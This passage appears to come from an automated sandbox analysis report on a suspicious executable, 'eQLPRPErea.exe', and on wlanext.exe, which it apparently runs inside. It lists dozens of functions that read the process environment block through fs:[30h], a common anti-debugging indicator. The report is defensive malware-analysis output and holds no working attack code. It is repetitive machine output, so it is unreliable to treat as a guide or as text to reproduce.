          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe
Code functions (process 9) that load the PEB pointer with mov eax, dword ptr fs:[00000030h]; entries marked "mov ecx" load it into ecx instead, and "xN" means the function contains N such loads:
9_2_0314131B, 9_2_0308DB40, 9_2_03158B58, 9_2_0308F358, 9_2_0308DB60 (mov ecx), 9_2_030B3B7A x2, 9_2_03091B8F x2, 9_2_0313D380 (mov ecx),
9_2_030BB390, 9_2_030B2397, 9_2_0314138A, 9_2_030B4BAD x3, 9_2_03155BA5, 9_2_031053CA x2, 9_2_030ADBE9, 9_2_030B03E2 x6,
9_2_0314AA16 x2, 9_2_03098A0A, 9_2_030A3A1C, 9_2_03085210 x4 (one of them mov ecx), 9_2_0308AA16 x2, 9_2_030C4A2C x2, 9_2_0314EA55, 9_2_03114257,
9_2_03089240 x4, 9_2_0313B260 x2, 9_2_030C927A, 9_2_03158A62, 9_2_030BD294 x2, 9_2_030852A5 x5, 9_2_0309AAB0 x2, 9_2_030BFAB0,
9_2_030B2ACB, 9_2_030B2AE4, 9_2_03089100 x3, 9_2_030A4120 x5 (one of them mov ecx), 9_2_030B513A x2, 9_2_030AB944 x2, 9_2_0308C962, 9_2_0308B171 x2,
9_2_030AC182, 9_2_030BA185, 9_2_030B2990, 9_2_030B61A0 x2, 9_2_031051BE x4, 9_2_031449A4 x4, 9_2_031069A6, 9_2_0308B1E1 x3,
9_2_031141E8, 9_2_03154015 x2, 9_2_03107016 x3, 9_2_0309B02A x4, 9_2_030B002D x5, 9_2_030A0050 x2, 9_2_03151074, 9_2_03142073,
9_2_03089080, 9_2_03103884 x2, 9_2_030C90AF, 9_2_030B20A0 x6, 9_2_030BF0BF x3 (one of them mov ecx), 9_2_0311B8D0 x6 (one of them mov ecx), 9_2_030858EC, 9_2_030840E1 x3,
9_2_0311FF10 x2, 9_2_030BA70E x2, 9_2_0315070D x2, 9_2_030AF716, 9_2_03084F2E x2, 9_2_030BE730, 9_2_0309EF40, 9_2_0309FF60,
9_2_03158F6A, 9_2_03107794 x3, 9_2_03098794, 9_2_030C37F5, 9_2_0308C600 x3, 9_2_030B8E00, 9_2_030BA61C x2, 9_2_03141608,
9_2_0308E620, 9_2_0313FE3F, 9_2_03097E41 x2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0313FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0310A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
